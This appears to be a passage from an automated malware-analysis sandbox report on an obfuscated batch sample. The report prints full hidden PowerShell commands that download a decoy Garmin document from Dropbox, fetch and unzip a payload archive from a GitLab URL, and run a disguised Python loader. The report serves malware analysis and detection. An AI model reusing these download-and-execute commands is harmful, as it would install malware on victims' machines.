                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: jn.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ystem.pdb=H source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb` source: powershell.exe, 0000000C.00000002.2306528560.000001FEF87D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000C.00000002.2306528560.000001FEF87D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IO.Compression.FileSystem.pdb7-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.2543362832.0000029579060000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *e.pdb source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbs source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 00000010.00000002.2543362832.000002957909B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: tem.pdb-z source: powershell.exe, 00000010.00000002.2544841727.0000029579571000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG5 source: powershell.exe, 00000010.00000002.2544841727.00000295795C7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2419838546.0000028FD5CD7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ion.pdb source: powershell.exe, 00000010.00000002.2544841727.00000295795C7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb6 source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bpdbtem.pdbbH source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5BF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000010.00000002.2543362832.0000029579060000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 00000010.00000002.2543362832.000002957909B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbg source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A14000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbF source: powershell.exe, 0000000E.00000002.2419838546.0000028FD5C99000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Yara detected Abobus Obfuscator
                  Source: Yara matchFile source: hngadsfkgj17.bat, type: SAMPLE
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD344D00BD pushad ; iretd 12_2_00007FFD344D00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD344D285F push esp; retf 12_2_00007FFD344D2862
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD344D7047 push esp; retf 12_2_00007FFD344D7048
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344C00BD pushad ; iretd 14_2_00007FFD344C00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344C2837 push esp; retf 14_2_00007FFD344C283A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344C7047 push esp; retf 14_2_00007FFD344C7048
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D00BD pushad ; iretd 16_2_00007FFD344D00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD344D27F7 push esp; retf 16_2_00007FFD344D27FA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD345A23EC push 8B485F93h; iretd 16_2_00007FFD345A23F1

                  Persistence and Installation Behavior

                  barindex
                  Tries to download and execute files (via powershell)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
